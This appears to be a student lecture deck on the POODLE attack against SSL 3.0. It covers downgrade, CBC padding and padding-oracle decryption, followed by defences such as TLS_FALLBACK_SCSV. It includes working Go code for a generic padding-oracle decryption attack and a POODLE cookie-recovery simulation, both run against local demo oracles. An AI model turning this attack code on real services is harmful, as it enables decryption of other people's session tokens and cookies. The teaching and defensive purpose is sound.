POODLE
Padding Oracle On Downgraded Legacy Encryption.
Shreyas Kothari
(140302003)
M.Tech (CNIS)
Introduction
• The Secure Sockets Layer (SSL) protocol was designed to provide a secure channel between two parties. It became the de facto industry standard and was widely adopted by vendors in their products.
• Weaknesses found in the early versions led to revisions: SSL 2.0 and SSL 3.0 (SSL 1.0 was never released publicly). SSL 3.0 was then succeeded by the IETF standard TLS, which in turn has versions TLS 1.0, TLS 1.1 and TLS 1.2. POODLE, the subject of these slides, is an active man-in-the-middle (MITM) attack against SSL 3.0 that was published in 2014, long after TLS had replaced it.
Introduction – Contd.
• Since SSL was so widely deployed, replacing every SSL product with TLS at once was not economical. TLS implementations therefore remained interoperable with SSL 3.0, and clients kept SSL 3.0 enabled to provide a smooth user experience.
• Even when both client and server support TLS, many clients implement a protocol "downgrade dance" to work around interoperability bugs in servers and middleboxes: if a handshake fails, the client retries with a lower protocol version. This behaviour is what makes POODLE (Padding Oracle On Downgraded Legacy Encryption) practical.
• Through this vulnerability an active attacker can decrypt bearer tokens such as HTTP cookies from SSL 3.0 traffic.
What is POODLE Attack ?
• As stated in the previous slides, many TLS clients offer a protocol downgrade dance to avoid interoperability bugs.
• In a normal handshake the client presents the highest protocol version it supports in ClientHello.client_version, and a correct server simply selects the highest version both sides support.
• Some broken servers and middleboxes instead drop the connection when they see a version they do not understand. To cope with them, the client retries the handshake with the next-lower version (TLS 1.2, then TLS 1.1, TLS 1.0 and finally SSL 3.0) until one succeeds.
• Here is the point: the client cannot tell a genuinely broken server from an attacker who deliberately drops its first handshake attempts.
Contd.
• If the network between client and server is controlled by an attacker, the attacker can drop every handshake that offers TLS and thereby force the connection to fall back to SSL 3.0. The protocol downgrade dance supported by clients is therefore the initial vector of this attack.
• Once the channel between the two entities has been moved down to SSL 3.0, the weakness in SSL 3.0 itself can be exploited.
• The vulnerability exploited is the well-known padding oracle attack against CBC-mode cipher suites.
• SSL 3.0 computes the MAC over the plaintext and then encrypts (MAC-then-encrypt), so the CBC padding is not covered by the MAC. Worse, SSL 3.0 only requires the last byte of the padding to state the padding length; the other padding bytes are not checked at all. This design flaw in SSL 3.0 is what makes the padding oracle possible.
Cipher Block Chaining (CBC)
Padding
• Block ciphers operate on fixed-size blocks (8 bytes for DES/3DES, 16 bytes for AES). Padding adds the extra bytes needed before encryption so that the plaintext length is a multiple of the block size.
• Here we are interested in the PKCS#5 padding scheme (RFC 2898), which is defined for 8-byte blocks; its generalisation to any block size is PKCS#7, and this is what is normally used with CBC mode.
• The final block of plaintext is padded with N bytes, each of value N, where 1 <= N <= block size. If the plaintext is already block-aligned, a whole block of padding is appended, so that the receiver can always strip the padding unambiguously.
PKCS#5
Padding Oracle Attack
• In cryptography, an "oracle" is a black box that answers a specific question about the input it is given, without revealing its key.
• Hence a "padding oracle" is a system that takes encrypted data from the user, decrypts it and reveals, through its response, whether the padding is correct or not.
• Let us now try to understand how this attack is performed.
Padding Oracle Attack
• Consider the URL below.
• https://www.example.com/home.asp?UID=8A219A434525535FF324D4G56FC9534
• Let us assume that some information (say a username) is sent in this UID parameter, encrypted in CBC mode with PKCS#5 padding. The application decrypts the value and builds its response from the result.
Padding Oracle Attack
• Three kinds of response are possible:
• Case 1) Valid padding and meaningful plaintext: a valid, normal page.
• Case 2) Valid padding but meaningless plaintext: an application-level error page (such as 404 – Not Found).
• Case 3) Invalid padding: the decryption routine throws an exception before the application ever sees the plaintext.
Padding Oracle Attack
• Case 1:
• Say you send the value UID=8A219A434525535FF324D4G56FC95348 and it decrypts to a valid user "Shreyas". The application sends a normal response.
• Case 2:
• Say you send the value UID=998877PA434525535FF324D4G56FC95348 and it decrypts, with valid padding, to "aswjkaja" (no such user). The application might respond with a 404 message saying no such page exists.
Padding Oracle Attack
• Case 3:
• Say you send the value UID=66IXS7IA434525535FF324D4G56FC95348 and the decrypted bytes do not end in valid padding. The unpadding routine raises an exception, and the application returns a generic error (often a 500) that looks different from Cases 1 and 2.
• Thus, if you can submit modified ciphertexts and tell from the response whether they decrypted with valid padding or not, you can decrypt any given ciphertext without knowing the key. The page content does not matter; the only signal needed is "valid padding" versus "invalid padding".
Padding Oracle Attack
• In CBC decryption, each ciphertext block is passed through the block cipher's decryption function, and the result (the "intermediate value") is XORed with the previous ciphertext block (or with the IV for the first block) to give the plaintext block.
• So if you take our example above, the ciphertext is first split into blocks as shown below (the 8-character groups are illustrative; a real block is 8 or 16 bytes).
• https://www.example.com/home.asp?UID=8A219A43|4525535F|F324D4G5|6FC95348
• Cipher blocks: 8A219A43 | 4525535F | F324D4G5 | 6FC95348
Padding Oracle Attack
• To attack the second block, send only the first two blocks and replace the first one with an attacker-chosen block, initially all zeros. The server uses our block as the "previous ciphertext block" when decrypting the second one, so the decrypted bytes are the intermediate value XOR zero. Their last byte is almost certainly not valid padding, so the server responds with the Case 3 error (typically a 500).
• https://www.example.com/home.asp?UID=00000000|4525535F
Padding Oracle Attack
• Now send the same request with the last byte of our chosen block set to 1 instead.
• https://www.example.com/home.asp?UID=00000001|4525535F
Padding Oracle Attack
• The server most likely still returns the error, but the last byte of the decrypted block has changed, since the byte we sent is XORed into it.
• We keep repeating this step, incrementing the last byte up to 0xFF. At some point we hit the value that produces the valid padding sequence 0x01.
• Exactly one of the 256 possibilities makes the final plaintext byte 0x01 (a different value may, by coincidence, produce valid padding such as 0x02 0x02; repeating the query with the second-to-last byte of our block altered rules this out).
• When you hit this value, you get a different response (Case 1 or 2) from the error returned for the other 255 requests.
Padding Oracle Attack
• From this we can calculate the intermediate value at this position: we know that XORing it with 0x3C produced 0x01.
• If [ Intermediate Value ] ^ 0x3C = 0x01
• then 0x3C ^ 0x01 = Intermediate Value
• Hence, Intermediate Value = 0x3D
• The plaintext byte is this intermediate value XORed with the corresponding byte of the real previous ciphertext block (the one we replaced).
• Next we set the last byte of our block to 0x3D ^ 0x02 so that it decrypts to 0x02, and search the second-to-last byte for the value that yields the valid padding 0x02 0x02. Repeating this, we work backwards through the entire block until every byte of the intermediate value is recovered, decrypting the block one byte at a time with at most 256 queries per byte.
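The following Go program is an added worked example (it is not code from the slides) that ties the padding slides and the padding oracle walkthrough above together. It implements PKCS#7 padding and AES-CBC, a server-side oracle that reveals only whether the padding was valid, and the attack that recovers the intermediate value and the plaintext of every block with at most 256 queries per byte, including the extra query that rules out a coincidental 0x02 0x02 hit on the last byte. The key, the IV and the token "UID=Shreyas;role=user" are assumptions for the demo; the attacker-side code (decryptBlock, decryptAll) never touches the key.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)
const blockSize = aes.BlockSize // 16 bytes
// pkcs7Pad appends N bytes of value N (1 <= N <= 16); block-aligned input gets a whole block.
func pkcs7Pad(p []byte) []byte {
	n := blockSize - len(p)%blockSize
	return append(append([]byte{}, p...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad fails on malformed padding; that failure is what the oracle leaks.
func pkcs7Unpad(p []byte) ([]byte, error) {
	n := 0
	if len(p) > 0 && len(p)%blockSize == 0 {
		n = int(p[len(p)-1])
	}
	if n == 0 || n > blockSize || !bytes.Equal(p[len(p)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return p[:len(p)-n], nil
}

// cbcEncrypt returns iv || AES-CBC(pkcs7Pad(plaintext)).
func cbcEncrypt(key, iv, plaintext []byte) []byte {
	blk, _ := aes.NewCipher(key)
	padded := pkcs7Pad(plaintext)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(out, padded)
	return append(append([]byte{}, iv...), out...)
}

// PaddingOracle models the server: it decrypts and reveals only whether the padding
// was valid (HTTP 500 versus any other page). The key never leaves it.
type PaddingOracle struct{ key []byte }
func (o PaddingOracle) Query(ivAndCt []byte) bool {
	if len(ivAndCt) < 2*blockSize || len(ivAndCt)%blockSize != 0 {
		return false
	}
	blk, _ := aes.NewCipher(o.key)
	pt := make([]byte, len(ivAndCt)-blockSize)
	cipher.NewCBCDecrypter(blk, ivAndCt[:blockSize]).CryptBlocks(pt, ivAndCt[blockSize:])
	_, err := pkcs7Unpad(pt)
	return err == nil
}

// decryptBlock recovers the intermediate value D_k(target) byte by byte by sending an
// attacker block x in place of the real previous block (the server then pad-checks
// D_k(target) XOR x), then XORs prev (the real previous block or the IV) back in.
func decryptBlock(o PaddingOracle, prev, target []byte) []byte {
	inter := make([]byte, blockSize)
	x := make([]byte, blockSize)
	for pos := blockSize - 1; pos >= 0; pos-- {
		pad := byte(blockSize - pos) // padding value to force at positions pos..15
		for j := pos + 1; j < blockSize; j++ {
			x[j] = inter[j] ^ pad // already-recovered bytes are made to decrypt to pad
		}
		g := 0
		for ; g < 256; g++ {
			x[pos] = byte(g)
			ok := o.Query(append(append([]byte{}, x...), target...))
			if ok && pos == blockSize-1 { // a last-byte hit could be a coincidental 0x02 0x02:
				x[pos-1] ^= 0xFF // altering the byte before it breaks that, not a real 0x01
				ok = o.Query(append(append([]byte{}, x...), target...))
				x[pos-1] ^= 0xFF
			}
			if ok {
				break
			}
		}
		if g == 256 {
			panic("oracle never accepted: the server does not leak padding validity")
		}
		inter[pos] = byte(g) ^ pad // because D_k(target)[pos] XOR g == pad
	}
	pt := make([]byte, blockSize)
	for i := range pt {
		pt[i] = inter[i] ^ prev[i]
	}
	return pt
}

// decryptAll decrypts every block of iv||ciphertext and strips the padding.
func decryptAll(o PaddingOracle, ivAndCt []byte) []byte {
	var padded []byte
	for i := blockSize; i < len(ivAndCt); i += blockSize {
		padded = append(padded, decryptBlock(o, ivAndCt[i-blockSize:i], ivAndCt[i:i+blockSize])...)
	}
	pt, _ := pkcs7Unpad(padded)
	return pt
}

func main() {
	key, iv := []byte("0123456789abcdef"), []byte("fedcba9876543210") // assumption: demo key and IV
	token := cbcEncrypt(key, iv, []byte("UID=Shreyas;role=user"))      // assumption: demo token
	fmt.Printf("recovered: %s\n", decryptAll(PaddingOracle{key: key}, token))
}
```

Query is the only thing the attacker ever calls, and it returns one bit. That is the whole lesson: an application that lets a padding failure surface as a distinguishable response (a different status code, a different error page, even a different response time) has handed out a decryption oracle. The usual fix is authenticated encryption, or at least MAC-then-verify before any decryption, so that tampered ciphertext is rejected uniformly without the padding ever being examined.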
Padding Oracle Attack on SSL 3.0
• Let us take one example to understand how the padding oracle attack is performed on SSL 3.0, following the "This POODLE Bites" paper listed in the references.
• The attacker injects JavaScript into the victim's browser (from any plain-HTTP page) that makes it send requests to the target site. Each request carries sensitive data, such as the HTTP cookie, in one of the CBC blocks, and the attacker chooses the request's length so that the final block consists entirely of padding.
• Before forwarding the record, the attacker replaces that final padding block with the block containing the cookie byte of interest.
• The server decrypts the substituted block and checks only its last byte, which must equal the padding length (block size minus one). This happens with probability 1/256; otherwise the record fails the check and the connection is closed. When it is accepted, the attacker knows the decrypted last byte was block size minus one and learns the cookie byte by XORing in the last bytes of the two relevant preceding ciphertext blocks.
• By shifting the request by one byte at a time, a new cookie byte lands in the last position of a block, so the whole cookie is revealed at a cost of about 256 requests per byte.
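The SSL 3.0 variant described above, as an added Go simulation (not code from the slides or from the POODLE paper). It builds SSL 3.0-style records (data || MAC || padding, where only the padding_length byte is checked), a server that accepts or rejects them, a victim whose request layout is controlled the way injected JavaScript would control it, and the attacker loop that copies the cookie's block over the padding block and recovers one cookie byte per accepted record. Assumptions: HMAC-SHA1 stands in for SSL 3.0's own MAC construction, a fresh random IV per record replaces SSL 3.0's IV chaining, the cookie length is taken as known (in practice it is read off the ciphertext length), and the keys, the request template and the cookie "session=7f3a9c1d" are demo values.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha1"
	"fmt"
	"strings"
)
// L is the block size; macLen is the MAC tag size (assumption: HMAC-SHA1 stands in
// for SSL 3.0's own MAC construction, which does not matter for the attack).
const L, macLen = aes.BlockSize, sha1.Size
// sslv3Seal builds an SSL 3.0-style CBC record: data || MAC || padding, where only
// the final byte (padding_length) carries meaning and the other padding bytes are
// never checked by the receiver. Returns iv || ciphertext.
func sslv3Seal(encKey, macKey, data []byte) []byte {
	m := hmac.New(sha1.New, macKey)
	m.Write(data)
	body := append(append([]byte{}, data...), m.Sum(nil)...)
	padLen := L - 1 - len(body)%L                // padding_length < L; total padding is padLen+1
	body = append(body, make([]byte, padLen)...) // unchecked bytes: zeros here, anything in reality
	body = append(body, byte(padLen))
	iv := make([]byte, L)
	rand.Read(iv) // assumption: fresh IV per record; SSL 3.0 chains IVs, with the same effect here
	blk, _ := aes.NewCipher(encKey)
	ct := make([]byte, len(body))
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(ct, body)
	return append(iv, ct...)
}

// sslv3Open is the server: decrypt, strip padding_length+1 bytes without inspecting
// them, then verify the MAC. True means the record was accepted.
func sslv3Open(encKey, macKey, rec []byte) bool {
	if len(rec) < 2*L || len(rec)%L != 0 {
		return false
	}
	blk, _ := aes.NewCipher(encKey)
	pt := make([]byte, len(rec)-L)
	cipher.NewCBCDecrypter(blk, rec[:L]).CryptBlocks(pt, rec[L:])
	padLen := int(pt[len(pt)-1])
	if padLen >= L || len(pt) < padLen+1+macLen {
		return false
	}
	pt = pt[:len(pt)-padLen-1]
	m := hmac.New(sha1.New, macKey)
	m.Write(pt[:len(pt)-macLen])
	return hmac.Equal(pt[len(pt)-macLen:], m.Sum(nil))
}

// victim models the browser: injected JavaScript chooses the path length, the browser
// appends the secret cookie, and the body length makes data||MAC block-aligned so that
// the last CBC block consists of padding only.
type victim struct{ encKey, macKey, cookie []byte }
const reqHead, reqMid = "GET /", " HTTP/1.1\r\nCookie: "
func (v victim) request(prefixLen int) []byte {
	data := []byte(reqHead + strings.Repeat("A", prefixLen) + reqMid)
	data = append(data, v.cookie...)
	data = append(data, "\r\n\r\n"...)
	data = append(data, bytes.Repeat([]byte{'B'}, (L-(len(data)+macLen)%L)%L)...)
	return sslv3Seal(v.encKey, v.macKey, data)
}

// poodle recovers the cookie at about 256 requests per byte. For cookie byte j it picks
// prefixLen so that the byte is the last one of some block i, copies C_i over the final
// all-padding block and watches whether the server accepts the record.
func poodle(v victim, server func([]byte) bool, cookieLen int) []byte {
	base := len(reqHead) + len(reqMid)
	out := make([]byte, 0, cookieLen)
	for j := 0; j < cookieLen; j++ {
		prefixLen := L - 1 - (base+j)%L // aligns cookie byte j to position L-1 of a block
		i := (base + prefixLen + j) / L  // index of that block; the IV is block -1
		for tries := 1; ; tries++ {
			rec := v.request(prefixLen)
			n := len(rec)/L - 1 // number of ciphertext blocks
			blk := func(k int) []byte { return rec[(k+1)*L : (k+2)*L] }
			copy(blk(n-1), blk(i)) // C_i replaces the padding block
			if server(rec) {
				// Accepted only if D(C_i)[L-1] XOR C_{n-2}[L-1] == L-1, which gives
				// P_i[L-1] = D(C_i)[L-1] XOR C_{i-1}[L-1].
				out = append(out, byte(L-1)^blk(n-2)[L-1]^blk(i-1)[L-1])
				break
			}
			if tries > 1<<16 {
				panic("server never accepted: the record layout assumption is wrong")
			}
		}
	}
	return out
}

func main() {
	encKey, macKey := []byte("0123456789abcdef"), []byte("mac-key-for-demo") // assumption: session keys
	v := victim{encKey, macKey, []byte("session=7f3a9c1d")}               // assumption: demo cookie
	server := func(rec []byte) bool { return sslv3Open(encKey, macKey, rec) }
	fmt.Printf("recovered cookie: %q\n", poodle(v, server, len(v.cookie)))
}
```

Two things are worth noticing when running this. First, sslv3Open is a perfectly reasonable implementation of the SSL 3.0 record layer; the bug is in the specification (unauthenticated, uninspected padding), not in the code. Second, every rejected record in the real attack tears down the SSL connection, which is why POODLE needs the attacker's JavaScript to keep the browser re-sending requests; the simulation simply calls request again.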
You can check whether your browser is vulnerable to the POODLE attack.
Go to the following website to check: https://www.poodletest.com
(Screenshots: Firefox v29, Firefox v34)
You can check whether any website is vulnerable to the POODLE attack or not.
Go to the following website: https://www.poodlescan.com
(Screenshots: https://www.manipal.edu, www.monsterindia.com)
Such scanners only test whether the server still accepts SSL 3.0 with a CBC cipher suite; they cannot tell you whether your clients would let themselves be downgraded to it.
Protection against POODLE Attack
• The only real fix is to disable SSL 3.0 on both clients and servers and use TLS; there is no patch that makes SSL 3.0's CBC mode safe.
• For TLS clients and servers: where SSL 3.0 cannot be removed yet, TLS clients that do a protocol downgrade dance should include TLS_FALLBACK_SCSV in ClientHello.cipher_suites in every fallback handshake (RFC 7507).
• The value tells the server that this handshake is a retry at a lower version. A server that sees TLS_FALLBACK_SCSV compares ClientHello.client_version with the highest version it supports itself; if it supports something higher, the first handshake must have been dropped by someone in the middle, so the server refuses the connection.
• Caveat: the SCSV only helps when both client and server implement it, and it does nothing when SSL 3.0 is genuinely the best version one side supports.
TLS_FALLBACK_SCSV
• The TLS Fallback Signaling Cipher Suite Value (SCSV), defined in RFC 7507, prevents the downgrade attack.
• TLS_FALLBACK_SCSV = {0x56, 0x00}
• This is a signalling cipher suite value, i.e. it does not correspond to an actual suite of cryptographic algorithms, and it can never be selected by the server in the handshake.
• If this value appears in ClientHello.cipher_suites and the highest protocol version supported by the server is higher than ClientHello.client_version, the server must respond with an inappropriate_fallback alert. This is a fatal error.
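The downgrade dance and the TLS_FALLBACK_SCSV rule from the last slides, as an added self-contained Go simulation (not code from the slides or from any TLS library; Go's own crypto/tls no longer offers SSL 3.0, so the handshake is modelled with plain functions and version numbers). It shows a client retrying TLS 1.2, TLS 1.0 and SSL 3.0 in turn, an attacker on the path dropping everything above SSL 3.0, and a server applying the RFC 7507 check, plus the two caveats from the protection slide: a legitimately broken old server still works with the SCSV, and an SSL 3.0-only server is not protected by it. Version and suite numbers are the real protocol values; the Server, mitm and downgradeDance types and functions are this example's own.

```go
package main

import (
	"errors"
	"fmt"
)

const (
	VersionSSL30 uint16 = 0x0300
	VersionTLS10 uint16 = 0x0301
	VersionTLS12 uint16 = 0x0303

	TLS_FALLBACK_SCSV            uint16 = 0x5600 // {0x56, 0x00}: a signal, never a real suite
	TLS_RSA_WITH_AES_128_CBC_SHA uint16 = 0x002F // an ordinary suite so the list is not empty
)

type ClientHello struct {
	ClientVersion uint16
	CipherSuites  []uint16
}

var (
	errConnReset             = errors.New("connection dropped")
	errInappropriateFallback = errors.New("fatal alert: inappropriate_fallback")
)

// Server negotiates min(client_version, MaxVersion) and applies the RFC 7507 rule:
// the SCSV next to a client_version below its own maximum means the handshake was
// downgraded by someone, so it aborts.
type Server struct {
	MaxVersion uint16
	Broken     bool // legacy bug: drops hellos carrying a client_version it does not know
}

func (s Server) Handshake(ch ClientHello) (uint16, error) {
	if s.Broken && ch.ClientVersion > s.MaxVersion {
		return 0, errConnReset
	}
	for _, cs := range ch.CipherSuites {
		if cs == TLS_FALLBACK_SCSV && s.MaxVersion > ch.ClientVersion {
			return 0, errInappropriateFallback
		}
	}
	if ch.ClientVersion < s.MaxVersion {
		return ch.ClientVersion, nil
	}
	return s.MaxVersion, nil
}

// mitm is an active attacker on the path who drops every handshake above SSL 3.0,
// which to the client looks exactly like a broken server.
func mitm(next func(ClientHello) (uint16, error)) func(ClientHello) (uint16, error) {
	return func(ch ClientHello) (uint16, error) {
		if ch.ClientVersion > VersionSSL30 {
			return 0, errConnReset
		}
		return next(ch)
	}
}

// downgradeDance is the client: try TLS 1.2, then TLS 1.0, then SSL 3.0. With
// withSCSV it marks every retry with TLS_FALLBACK_SCSV and stops on the alert.
func downgradeDance(send func(ClientHello) (uint16, error), withSCSV bool) (uint16, error) {
	var lastErr error
	for i, v := range []uint16{VersionTLS12, VersionTLS10, VersionSSL30} {
		ch := ClientHello{ClientVersion: v, CipherSuites: []uint16{TLS_RSA_WITH_AES_128_CBC_SHA}}
		if withSCSV && i > 0 {
			ch.CipherSuites = append(ch.CipherSuites, TLS_FALLBACK_SCSV)
		}
		ver, err := send(ch)
		if err == nil {
			return ver, nil
		}
		if errors.Is(err, errInappropriateFallback) {
			return 0, err // the server says this fallback is an attack: do not go lower
		}
		lastErr = err
	}
	return 0, lastErr
}

func main() {
	modern := Server{MaxVersion: VersionTLS12}
	for _, c := range []struct {
		name string
		send func(ClientHello) (uint16, error)
		scsv bool
	}{
		{"clean network, no SCSV", modern.Handshake, false},
		{"attacker on path, no SCSV", mitm(modern.Handshake), false},
		{"attacker on path, with SCSV", mitm(modern.Handshake), true},
		{"legacy TLS 1.0 server that drops unknown versions, with SCSV", Server{MaxVersion: VersionTLS10, Broken: true}.Handshake, true},
		{"SSL 3.0-only server, attacker on path, with SCSV", mitm(Server{MaxVersion: VersionSSL30}.Handshake), true},
	} {
		ver, err := downgradeDance(c.send, c.scsv)
		fmt.Printf("%-62s -> version 0x%04x, err=%v\n", c.name, ver, err)
	}
}
```

The last two scenarios are the ones to keep in mind when deploying the SCSV: it never breaks a legitimate fallback, because a server whose best version really is the one the client retried with sees no contradiction, and for exactly the same reason it cannot protect a server that speaks nothing newer than SSL 3.0. Disabling SSL 3.0 is the fix; the SCSV is a stop-gap for the transition.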
Any doubts?
References
• Padding Oracle Attack: http://resources.infosecinstitute.com/padding-oracle-attack-2/
• POODLE Attack: http://resources.infosecinstitute.com/end-ssl-poodle/
• B. Möller, T. Duong, K. Kotowicz, "This POODLE Bites: Exploiting the SSL 3.0 Fallback": https://www.openssl.org/~bodo/ssl-poodle.pdf
• PKCS #5 (RFC 2898): http://tools.ietf.org/html/rfc2898
Poodle

Contenu connexe

Tendances

Cryptography and Network Lecture Notes
Cryptography and Network Lecture NotesCryptography and Network Lecture Notes
Cryptography and Network Lecture NotesFellowBuddy.com
 
Cryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherCryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherNiloy Biswas
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
RSA & MD5 algorithm
RSA & MD5 algorithmRSA & MD5 algorithm
RSA & MD5 algorithmSiva Rushi
 
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSISIMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSISShivam Porwal
 
Steganography presentation
Steganography presentationSteganography presentation
Steganography presentationAshwin Prasad
 
Introduction to Network Security
Introduction to Network SecurityIntroduction to Network Security
Introduction to Network SecurityJohn Ely Masculino
 
Symmetric encryption and message confidentiality
Symmetric encryption and message confidentialitySymmetric encryption and message confidentiality
Symmetric encryption and message confidentialityCAS
 
Presentation On Steganography
Presentation On SteganographyPresentation On Steganography
Presentation On SteganographyTeachMission
 

Tendances (20)

Hybrid encryption
Hybrid encryption Hybrid encryption
Hybrid encryption
 
Transposition Cipher
Transposition CipherTransposition Cipher
Transposition Cipher
 
Firewall in Network Security
Firewall in Network SecurityFirewall in Network Security
Firewall in Network Security
 
Cyber security
Cyber security Cyber security
Cyber security
 
Cryptography and Network Lecture Notes
Cryptography and Network Lecture NotesCryptography and Network Lecture Notes
Cryptography and Network Lecture Notes
 
Hash Function
Hash FunctionHash Function
Hash Function
 
RSA ALGORITHM
RSA ALGORITHMRSA ALGORITHM
RSA ALGORITHM
 
Cryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherCryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipher
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
 
software-security.ppt
software-security.pptsoftware-security.ppt
software-security.ppt
 
RSA & MD5 algorithm
RSA & MD5 algorithmRSA & MD5 algorithm
RSA & MD5 algorithm
 
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSISIMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
 
CONVENTIONAL ENCRYPTION
CONVENTIONAL ENCRYPTIONCONVENTIONAL ENCRYPTION
CONVENTIONAL ENCRYPTION
 
Hash function
Hash function Hash function
Hash function
 
Social Engineering.pdf
Social Engineering.pdfSocial Engineering.pdf
Social Engineering.pdf
 
Steganography presentation
Steganography presentationSteganography presentation
Steganography presentation
 
Introduction to Network Security
Introduction to Network SecurityIntroduction to Network Security
Introduction to Network Security
 
Symmetric encryption and message confidentiality
Symmetric encryption and message confidentialitySymmetric encryption and message confidentiality
Symmetric encryption and message confidentiality
 
Email security
Email securityEmail security
Email security
 
Presentation On Steganography
Presentation On SteganographyPresentation On Steganography
Presentation On Steganography
 

En vedette

The Poodle Presentation
The Poodle PresentationThe Poodle Presentation
The Poodle Presentationziuzita
 
Malicious file upload attacks - a case study
Malicious file upload attacks - a case studyMalicious file upload attacks - a case study
Malicious file upload attacks - a case studyOktawian Powazka
 
Crypto 101: Encryption, Codebreaking, SSL and Bitcoin
Crypto 101: Encryption, Codebreaking, SSL and BitcoinCrypto 101: Encryption, Codebreaking, SSL and Bitcoin
Crypto 101: Encryption, Codebreaking, SSL and BitcoinPriyanka Aash
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)Jerome Smith
 
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...Amazon Web Services
 
SSL/POODLE: History repeats itself
SSL/POODLE: History repeats itselfSSL/POODLE: History repeats itself
SSL/POODLE: History repeats itselfYurii Bilyk
 
CamSec Sept 2016 - Tricks to improve web app excel export attacks
CamSec Sept 2016 - Tricks to improve web app excel export attacksCamSec Sept 2016 - Tricks to improve web app excel export attacks
CamSec Sept 2016 - Tricks to improve web app excel export attacksJerome Smith
 
BSides MCR 2016: From CSV to CMD to qwerty
BSides MCR 2016: From CSV to CMD to qwertyBSides MCR 2016: From CSV to CMD to qwerty
BSides MCR 2016: From CSV to CMD to qwertyJerome Smith
 
Defect life cycle and Defect Status Life Cycle
Defect life cycle and Defect Status Life CycleDefect life cycle and Defect Status Life Cycle
Defect life cycle and Defect Status Life Cyclepavansmiles
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...Simone Onofri
 
Ssl (Secure Sockets Layer)
Ssl (Secure Sockets Layer)Ssl (Secure Sockets Layer)
Ssl (Secure Sockets Layer)Asad Ali
 
SSL & TLS Architecture short
SSL & TLS Architecture shortSSL & TLS Architecture short
SSL & TLS Architecture shortAvirot Mitamura
 
Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks Venkatesh Iyer
 

En vedette (20)

SSLv3 and POODLE
SSLv3 and POODLESSLv3 and POODLE
SSLv3 and POODLE
 
Ssl attacks
Ssl attacksSsl attacks
Ssl attacks
 
Poodle
PoodlePoodle
Poodle
 
The Poodle Presentation
The Poodle PresentationThe Poodle Presentation
The Poodle Presentation
 
Malicious file upload attacks - a case study
Malicious file upload attacks - a case studyMalicious file upload attacks - a case study
Malicious file upload attacks - a case study
 
Crypto 101: Encryption, Codebreaking, SSL and Bitcoin
Crypto 101: Encryption, Codebreaking, SSL and BitcoinCrypto 101: Encryption, Codebreaking, SSL and Bitcoin
Crypto 101: Encryption, Codebreaking, SSL and Bitcoin
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)
 
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
 
SSL/POODLE: History repeats itself
SSL/POODLE: History repeats itselfSSL/POODLE: History repeats itself
SSL/POODLE: History repeats itself
 
CamSec Sept 2016 - Tricks to improve web app excel export attacks
CamSec Sept 2016 - Tricks to improve web app excel export attacksCamSec Sept 2016 - Tricks to improve web app excel export attacks
CamSec Sept 2016 - Tricks to improve web app excel export attacks
 
BSides MCR 2016: From CSV to CMD to qwerty
BSides MCR 2016: From CSV to CMD to qwertyBSides MCR 2016: From CSV to CMD to qwerty
BSides MCR 2016: From CSV to CMD to qwerty
 
Defect life cycle and Defect Status Life Cycle
Defect life cycle and Defect Status Life CycleDefect life cycle and Defect Status Life Cycle
Defect life cycle and Defect Status Life Cycle
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...
 
Ssl (Secure Sockets Layer)
Ssl (Secure Sockets Layer)Ssl (Secure Sockets Layer)
Ssl (Secure Sockets Layer)
 
SSL/TLS
SSL/TLSSSL/TLS
SSL/TLS
